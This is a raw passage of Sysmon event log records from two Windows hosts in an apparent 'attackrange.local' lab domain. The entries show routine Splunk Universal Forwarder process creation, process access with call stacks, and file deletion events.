Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=906271D16D7FF80EB65BFC790F8EB8E5,SHA256=8707110C72638066807F142FAE75292C2708D2AF9F6676A6BC8574A9E0683FE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050949Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.792{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7AB36694005E640183F129BC0DEF858,SHA256=3CFA6EF905760E1C52EE1CC78E939594BB2242ED4A51CBD5FEB1695E3BED7731,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050948Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.448{85C0FFC9-EC6E-607E-FC06-00000000BB01}35042940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050947Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC6E-607E-FC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050946Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050945Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050944Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050943Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050942Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050941Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050940Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050939Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050938Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050937Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC6E-607E-FC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050936Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC6E-607E-FC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050935Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.339{85C0FFC9-EC6E-607E-FC06-00000000BB01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050934Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.135{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F9E32E76A5207DBAAAF411490F0B139,SHA256=0D2EF5CA8521BE35D4AC77C3826AA147E3D20335C98FFC60C583FABD1C660522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050933Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:58.135{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1751CC56EE166573CE1FF463C1F00E60,SHA256=9E0DD585FF8AF081C33005D3759C867CB5C9EEC7EC04251E1402A651369255A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.839{A7A01FEF-B626-607E-1400-00000000BB01}12762020C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC6F-607E-6E0F-00000000BB01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC6F-607E-6E0F-00000000BB01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC6F-607E-6E0F-00000000BB01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.824{A7A01FEF-EC6F-607E-6E0F-00000000BB01}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.496{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE7726F7AF871D01EFB5E64DCE6BCFCE,SHA256=F1A740A5C5279D362255C214D92CA0F7FCD79A756F08F147ACF589124BC8A165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.199{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.105{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5E723D8C6C78AF7572B3EC1953FCC62B,SHA256=61D7C7438D76020A58F283D3F496D31803C1069F74E35ABCC3323FB77F44B9C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:59.105{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5A18163E67C27D3F1E4112E5DF8F399C,SHA256=B13B04FCD74763EF42339BF90A32A9A8C9F17D100145F07FB3809AD174345068,IMPHASH=00000000000000000000000000000000falsetrue 